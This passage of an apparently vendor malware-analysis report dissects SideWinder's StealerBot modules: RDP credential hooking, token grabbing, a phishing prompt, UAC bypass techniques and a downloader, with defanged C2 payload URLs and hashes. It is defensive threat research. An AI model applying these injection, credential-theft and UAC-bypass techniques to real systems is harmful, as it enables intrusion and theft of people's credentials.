The library can also process custom commands that provide the following capabilities:</p> <ul> <li>Kill the module itself or its child processes;</li> <li>Download additional files to compromised systems;</li> <li>Add Windows Defender exclusions;</li> <li>Infect other users on the local system (requires high privileges);</li> <li>Download and execute remote HTML applications;</li> <li>Load arbitrary modules and extend malware capabilities.</li> </ul> <p>Unlike the other modules, Live Console communicates directly with a C2 whose address is embedded in the module&#8217;s code. By default, the malware starts a new &#8220;cmd.exe&#8221; process, forwards data received from the attacker to its standard input, and forwards the process output or error pipeline to the attacker.</p> <p>If the infected OS is recent, i.e., Windows 10 build version greater than or equal to &#8220;17763&#8221;, the malware creates a <a href="https://learn.microsoft.com/en-us/windows/console/pseudoconsoles" target="_blank" rel="noopener">pseudoconsole</a> to launch &#8220;cmd.exe&#8221;. Otherwise, it launches the same application using the &#8220;Process&#8221; class specified in &#8220;System.Diagnostics&#8221;.</p> <p>Before forwarding the command to the console, the malware checks if the first byte of the received data has a specific value that indicates the presence of a custom command. Below is a list of these values (command IDs) with descriptions of the commands they identify.</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Windows build</strong></td> <td width="30%"><strong>Command ID</strong></td> <td width="40%"><strong>Description</strong></td> </tr> <tr> <td><strong> &lt;  </strong>17763</td> <td>3</td> <td>Kill all child processes</td> </tr> <tr> <td><strong> &lt;  </strong>17763</td> <td>4</td> <td>Kill the current module. 
Sends the message ID &#8220;2&#8221; to the Orchestrator to unload the module itself.</td> </tr> <tr> <td><strong> &lt;  </strong>17763</td> <td>16</td> <td>Upload file to the infected system</td> </tr> <tr> <td><strong>&gt;=  </strong>17763</td> <td>1</td> <td>Infect current logged-in user</td> </tr> <tr> <td><strong>&gt;=  </strong>17763</td> <td>2</td> <td>Get current logged-in user</td> </tr> <tr> <td><strong>&gt;=  </strong>17763</td> <td>3</td> <td>Download and execute a remote HTML application</td> </tr> <tr> <td><strong>&gt;=  </strong>17763</td> <td>4</td> <td>Add directories to AV exclusions</td> </tr> <tr> <td><strong>&gt;=  </strong>17763</td> <td>5</td> <td>Load a plugin</td> </tr> </tbody> </table> <p>Most of the commands are self-explanatory. We&#8217;d like to add a few words on the command with ID &#8220;1&#8221;, which is used to infect other users on the same system whose profile is still &#8220;clean&#8221;. The malware infects the user by creating a copy of the samples in the target user&#8217;s directory and creates a new registry value to ensure persistence.</p> <p>This command is interesting because in the case of a specific error, the bot replies with the following message:</p> <div id="crayon-67446d0bc5e40903193986" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" 
title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> Infected User is already logged in, use install dynx command from stealer bot for installation</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e40903193986-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e40903193986-2">2</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e40903193986-1"><span class="crayon-e">Infected </span><span class="crayon-e">User </span><span class="crayon-st">is</span><span class="crayon-h"> </span><span class="crayon-e">already </span><span class="crayon-e">logged </span><span class="crayon-st">in</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span 
class="crayon-st">use</span><span class="crayon-h"> </span><span class="crayon-e">install </span><span class="crayon-e">dynx </span><span class="crayon-e">command </span><span class="crayon-e">from </span><span class="crayon-e">stealer </span><span class="crayon-e">bot </span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e40903193986-2"><span class="crayon-st">for</span><span class="crayon-h"> </span><span class="crayon-i">installation</span></div></div></td> </tr> </table> </div> </div><p> Currently, we don&#8217;t know what the dynx command represents, but the name &#8220;stealer bot&#8221; in this message and the name of the resource embedded in the &#8220;ModuleInstaller&#8221;, &#8220;StealerBot_CppInstaller&#8221;, led us to conclude that the attacker named this malware StealerBot.</p> <h4 id="rdp-credential-stealer">RDP Credential Stealer</h4> <p>This module consists of different components: a .NET library, shellcode, and a C++ library. It monitors running processes and injects malicious code into &#8220;mstsc.exe&#8221; to steal RDP credentials.</p> <div id="attachment_114138" style="width: 426px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152934/SideWinder_2024_12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114138" class="size-full wp-image-114138" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152934/SideWinder_2024_12.png" alt="mstsc.exe GUI" width="416" height="263" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152934/SideWinder_2024_12.png 416w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07152934/SideWinder_2024_12-300x190.png 300w" sizes="(max-width: 416px) 100vw, 416px" /></a><p id="caption-attachment-114138" class="wp-caption-text">mstsc.exe GUI</p></div> <p>Mstsc.exe is the &#8220;Microsoft 
Terminal Service Client&#8221; process, which is the default RDP client on Windows. The malware monitors the creation or termination of processes with the name &#8220;mstsc.exe&#8221;. When a new creation event is detected the malware creates a new pipe with the static name &#8220;c63hh148d7c9437caa0f5850256ad32c&#8221; and injects malicious code into the new process memory.</p> <p>The injected code consists of different payloads that are embedded in the module as resources. The payloads are selected at runtime according to the system architecture, and merged before injection. The injected code is a shellcode that loads another malicious library called &#8220;mscorlib&#8221;, written in C++ to steal RDP credentials by hooking specific functions of the Windows library &#8220;SspiCli.dll&#8221;. The library code appears to be based on open-source projects available on GitHub. It uses the Microsoft Detours Package to add or remove the hooks to the following functions:</p> <ul> <li>SspiPrepareForCredRead;</li> <li>CryptProtectMemory;</li> <li>CredIsMarshaledCredentialW.</li> </ul> <p>The three functions are hooked to obtain the server name, password, and username, respectively. 
The stolen data are sent to the main module using the previously created pipe named &#8220;c63hh148d7c9437caa0f5850256ad32c&#8221;.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-114139" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13.png" alt="" width="918" height="370" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13.png 918w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13-300x121.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13-768x310.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13-868x350.png 868w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13-740x298.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13-695x280.png 695w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153221/SideWinder_2024_13-800x322.png 800w" sizes="(max-width: 918px) 100vw, 918px" /></a></p> <h4 id="token-grabber">Token Grabber</h4> <p>The module is a .NET library designed to steal Google Chrome browser cookies and authentication tokens related to Facebook, LinkedIn and Google services (Gmail, Google Drive, etc.). It has many code dependencies and starts by loading additional legitimate and signed libraries whose functions it uses. 
These libraries are not present on the compromised system by default, so the malware has to drop and load them to function properly.</p> <table width="100%"> <tbody> <tr> <td width="25%"><strong>Library</strong></td> <td width="45%"><strong>Hash</strong></td> <td width="30%"><strong>Description</strong></td> </tr> <tr> <td>Newtonsoft.Json</td> <td>52a7a3100310400e4655fb6cf204f024</td> <td>A popular high-performance JSON framework for .NET</td> </tr> <tr> <td>System.Data.SQLite</td> <td>fcb2bc2caf7456cd9c2ffab633c1aa0b</td> <td>An ADO.NET provider for SQLite</td> </tr> <tr> <td>SQLite_Interop_x64.dll</td> <td>1b0114d4720af20f225e2fbd653cd296</td> <td>A library for 64-bit architectures required by System.Data.SQLite to work properly</td> </tr> <tr> <td>SQLite_Interop_x86.dll</td> <td>f72f57aa894f7efbef7574a9e853406d</td> <td>A library for 32-bit architectures required by System.Data.SQLite to work properly</td> </tr> </tbody> </table> <h4 id="credential-phisher">Credential Phisher</h4> <p>This module attempts to harvest the user&#8217;s Windows credentials by displaying a phishing prompt designed to deceive the victim.</p> <div id="attachment_114140" style="width: 471px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153520/SideWinder_2024_14.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114140" class="size-full wp-image-114140" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153520/SideWinder_2024_14.png" alt="Phishing prompt" width="461" height="305" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153520/SideWinder_2024_14.png 461w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153520/SideWinder_2024_14-300x198.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07153520/SideWinder_2024_14-423x280.png 423w" 
sizes="(max-width: 461px) 100vw, 461px" /></a><p id="caption-attachment-114140" class="wp-caption-text">Phishing prompt</p></div> <p>Similar to the RDP Credential Stealer, the malware creates a new pipe (&#8220;a21hg56ue2c2365cba1g9840256ad31c&#8221;) and injects malicious shellcode into a targeted process, in this case &#8220;explorer.exe&#8221;. The shellcode loads a malicious library called &#8220;credsphisher.dll&#8221;, which uses the Windows function &#8220;CredUIPromptForWindowsCredentialsW&#8221; to display a phishing prompt to current users and trick victims into entering their Windows credentials.</p> <p>When the user enters the credentials, the malware uses the &#8220;LogonUserW&#8221; function to check that the username and password provided are correct. If the user enters incorrect credentials, the malware continues to display the prompt until it receives a valid password. Finally, upon successful credential validation, the malware writes the computer hostname, username and password to a previously created pipe named &#8220;a21hg56ue2c2365cba1g9840256ad31c&#8221;.</p> <h4 id="uacbypass">UACBypass</h4> <p>This module is a .NET library designed to bypass UAC and run malicious code with high privileges.</p> <p>The library can achieve its goal using different bypass techniques, selected according to the Windows version and the security solution installed on the infected machine. 
The malware embeds various resources containing different payloads used during malware execution.</p> <table width="100%"> <tbody> <tr> <td width="25%"><strong>Library</strong></td> <td width="45%"><strong>Hash</strong></td> <td width="30%"><strong>Description</strong></td> </tr> <tr> <td>COMUacBypass</td> <td>7f357621ba88a2a52b8146492364b6e0</td> <td>Library used to bypass UAC abusing IElevatedFactoryServer COM object</td> </tr> <tr> <td>manifest</td> <td>d3136d7151f60ec41a370f4743c2983b</td> <td>XML manifest</td> </tr> <tr> <td>Module</td> <td>b0f0c29f4143605d5f958eba664cc295</td> <td>Malicious library used to download additional malware</td> </tr> <tr> <td>ReflectiveDllLoader</td> <td>f492b2d5431985078b85c78661e20c09</td> <td>Shellcode to run libraries in memory</td> </tr> <tr> <td>VmComputeAgent</td> <td>ba2914b59c7ae08c346fc5a984dcc219</td> <td>Program used for Slui UAC bypass technique</td> </tr> <tr> <td>VmComputeAgent_exe</td> <td>d3136d7151f60ec41a370f4743c2983b</td> <td>XML manifest</td> </tr> </tbody> </table> <p>Before starting its execution, the malware checks certain conditions on the system, namely that UAC elevation doesn&#8217;t require admin credentials and that the infected user belongs to the &#8216;Administrator&#8217; group. 
If both conditions are met, the malware checks the Windows version and drops some artifacts according to the obtained values.</p> <table width="100%"> <tbody> <tr> <td colspan="2"><strong>Windows Server or Windows NT 6</strong></td> </tr> <tr> <td width="50%">%Temp%\%TempFile%</td> <td width="50%">Copy of resource named &#8220;Module&#8221;</td> </tr> <tr> <td>%localappdata%\Microsoft\rundll32.exe</td> <td>Copy of the legitimate program &#8220;%systemroot%\System32\rundll32.exe&#8221;</td> </tr> <tr> <td>%localappdata%\Microsoft\rundll32.exe.config</td> <td>Copy of resource named &#8220;manifest&#8221;</td> </tr> <tr> <td colspan="2"><strong>Other Windows versions</strong></td> </tr> <tr> <td>%localappdata%\Microsoft\devobj.dll</td> <td>Copy of resource named &#8220;Module&#8221;</td> </tr> <tr> <td>%localappdata%\Microsoft\rdpclip.exe</td> <td>Copy of the legitimate program &#8220;%systemroot%\System32\rdpclip.exe&#8221;</td> </tr> </tbody> </table> <p>The main goal of this component is to execute the resource named &#8220;Module&#8221;, which is a downloader, with high privileges. The malware tries to use different UAC bypass techniques, which are selected according to the installed security solution. By default, it tries to abuse the CMSTP (Windows Connection Manager Profile Installer) program. This legitimate program is abused with <a href="https://oddvar.moe/2017/08/15/research-on-cmstp-exe/" target="_blank" rel="noopener">a technique</a> discovered in 2017, where the attacker can pass a custom profile to execute arbitrary commands with high privilege. 
The default bypass technique is used on all systems except those protected by Kaspersky or 360 Total Security.</p> <p>If these security solutions are detected, the malware attempts to use <a href="https://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.2_from_COM_to_UAC_bypass_and_get_SYSTEM_dirtectly.html" target="_blank" rel="noopener">a more recent UAC bypass technique</a> discovered in 2022, which abuses the &#8220;IElevatedFactoryServer&#8221; COM object.</p> <p>In this case, the malware injects malicious shellcode into &#8220;explorer.exe&#8221;. The shellcode loads and executes a malicious library that was stored in the resource named &#8220;COMUacBypass&#8221;. The library uses the &#8220;IElevatedFactoryServer&#8221; COM object to register a new Windows task with the highest privileges, allowing the attacker to execute the command to run the dropped payload with elevated privileges.</p> <p>During the static analysis of the &#8220;UACBypass&#8221; module we noticed the presence of code that is not called or executed. Specifically, we noticed a method named &#8220;KasperskyUACBypass&#8221; that implements another bypass technique that was probably used in the past when the system was protected by Kaspersky anti-malware software. The method implements a bypass technique that abuses the legitimate Windows program slui.exe. It is used to activate and register the operating system with a valid product key, but is prone to a file handler hijacking weakness. The hijacking technique <a href="https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b" target="_blank" rel="noopener">was described</a> in 2020 and is based on the modification of specific Windows registry keys. 
Based on the created values, we believe the attacker based their code on a proof of concept available on GitHub.</p> <p>The module still includes two resources that are used exclusively by this code:</p> <div id="crayon-67446d0bc5e43560420898" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> VmComputeAgent VmComputeAgent_exe</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> 
<td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e43560420898-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e43560420898-2">2</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e43560420898-1"><span class="crayon-e">VmComputeAgent</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e43560420898-2"><span class="crayon-i">VmComputeAgent_exe</span></div></div></td> </tr> </table> </div> </div><p> The first is a very simple program, packed with ConfuserEx, which starts a new process: &#8220;%systemroot%\System32\slui.exe&#8221; as administrator.</p> <p>The second is an XML manifest.</p> <h4 id="downloader">Downloader</h4> <p>The library is a downloader developed in C++ that attempts to retrieve three payloads using different URLs.</p> <div id="crayon-67446d0bc5e45257450968" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div 
class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/bf7dy/111e9a21?name=inpl64 hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/0ywcg/4dfc92c?name=stg64 hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/3ysvj/955da0ae?name=rflr</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e45257450968-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e45257450968-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e45257450968-3">3</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e45257450968-1"><span class="crayon-i">hxxps</span><span 
class="crayon-sy">:</span><span class="crayon-c">//nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/bf7dy/111e9a21?name=inpl64</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e45257450968-2"><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/0ywcg/4dfc92c?name=stg64</span></div><div class="crayon-line" id="crayon-67446d0bc5e45257450968-3"><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/3ysvj/955da0ae?name=rflr</span></div></div></td> </tr> </table> </div> </div><p> Unfortunately, we were not able to get a valid response from the server, but considering the &#8220;name&#8221; variable inside the URL and the logic of the various components observed during the investigation, we can infer that each &#8220;name&#8221; value probably also indicates the real purpose of the file.</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Variable</strong></td> <td width="70%"><strong>Description</strong></td> </tr> <tr> <td>?name=inpl64</td> <td>implant for 64-bit architectures</td> </tr> <tr> <td>?name=stg64</td> <td>stager for 64-bit architectures</td> </tr> <tr> <td>?name=rlfr</td> <td>reflective loader ???</td> </tr> </tbody> </table> <p>The downloaded data are combined into a final payload with the following structure:</p> <div id="crayon-67446d0bc5e48979555869" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px 
!important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> stg64 + &lt;size of rlfr+inpl64+8&gt; + rlfr + &lt;delimiter&gt; + inpl64</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e48979555869-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e48979555869-1"><span class="crayon-i">stg64</span><span class="crayon-h"> </span>+<span class="crayon-h"> 
</span><span class="crayon-h">&lt;</span><span class="crayon-e">size </span><span class="crayon-e">of </span><span class="crayon-i">rlfr</span>+<span class="crayon-i">inpl64</span>+<span class="crayon-cn">8</span><span class="crayon-h">&gt;</span><span class="crayon-h"> </span>+<span class="crayon-h"> </span><span class="crayon-i">rlfr</span><span class="crayon-h"> </span>+<span class="crayon-h"> </span><span class="crayon-h">&lt;</span><span class="crayon-i">delimiter</span><span class="crayon-h">&gt;</span><span class="crayon-h"> </span>+<span class="crayon-h"> </span><span class="crayon-i">inpl64</span></div></div></td> </tr> </table> </div> </div><p> Finally, the malware loads the payload into memory and executes it. The execution method is selected according to the version of Windows.</p> <p>On systems prior to Windows 10, the malware allocates a memory region with read, write and execution permissions, copies the previously generated payload to the new region, and directly calls the first address.</p> <p>On newer systems, the malware allocates a larger memory space and prepends a small shellcode located in the &#8220;.data&#8221; section to the final payload.</p> <p>The malware then patches the kernel32 image in memory and hooks the &#8220;LoadLibraryA&#8221; function to redirect the execution flow to the small shellcode copied in the allocated region.</p> <p>Finally, it calls the &#8220;LoadLibraryA&#8221; function, passing the argument &#8220;aepic.dll&#8221;.</p> <div id="attachment_114141" style="width: 718px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154250/SideWinder_2024_15.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114141" class="size-full wp-image-114141" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154250/SideWinder_2024_15.png" alt="Snippet of reversed code used to hook LoadLibrary 
and run the payload " width="708" height="113" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154250/SideWinder_2024_15.png 708w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154250/SideWinder_2024_15-300x48.png 300w" sizes="(max-width: 708px) 100vw, 708px" /></a><p id="caption-attachment-114141" class="wp-caption-text">Snippet of reversed code used to hook LoadLibrary and run the payload</p></div> <p>The small shellcode compares the first 8 bytes of the received argument with the static string &#8220;aepic.dl&#8221;, and if the bytes match, it jumps to the downloaded shellcode &#8220;stg64&#8221;; otherwise, it jumps to the real &#8220;LoadLibraryA&#8221; function.</p> <div id="attachment_114142" style="width: 663px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154331/SideWinder_2024_16.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114142" class="size-full wp-image-114142" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154331/SideWinder_2024_16.png" alt="Shellcode embedded in the downloader image" width="653" height="161" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154331/SideWinder_2024_16.png 653w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154331/SideWinder_2024_16-300x74.png 300w" sizes="(max-width: 653px) 100vw, 653px" /></a><p id="caption-attachment-114142" class="wp-caption-text">Shellcode embedded in the downloader image</p></div> <h5 id="installers">Installers</h5> <p>During the investigation we found two more components, which are installers used to deploy the StealerBot on the systems. We didn&#8217;t observe them during the infection chain. 
They are probably used to install new versions of the malware or to deploy the malware in a different context on the same machine, for example to infect another user.</p> <h6 id="installerpayload">InstallerPayload</h6> <p>The first component is a library developed in C++ that acts as a loader. Its code is very similar to that of the &#8220;Downloader&#8221; component observed in the UAC bypass module. The library contains different payloads that are joined together at runtime and injected into the remote &#8220;spoolsv.exe&#8221; process.</p> <p>The injected payload reflectively loads a library called &#8220;InstallerPayload.dll&#8221;, written in C++, which downloads additional components and maintains their persistence by creating a new Windows service.</p> <p>The malware is configured to download the files from a predefined URL using WinHTTP.</p> <div id="crayon-67446d0bc5e4a225850676" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div 
class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> hxxps://pafgovt[.]com/mod/rnd/214/15109/14786/X6HPUSbM5luLGTzAhI12Ly8CfydiP869E F0mo673/1/1706084656128/x3l8o/2c821e</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e4a225850676-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e4a225850676-2">2</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; 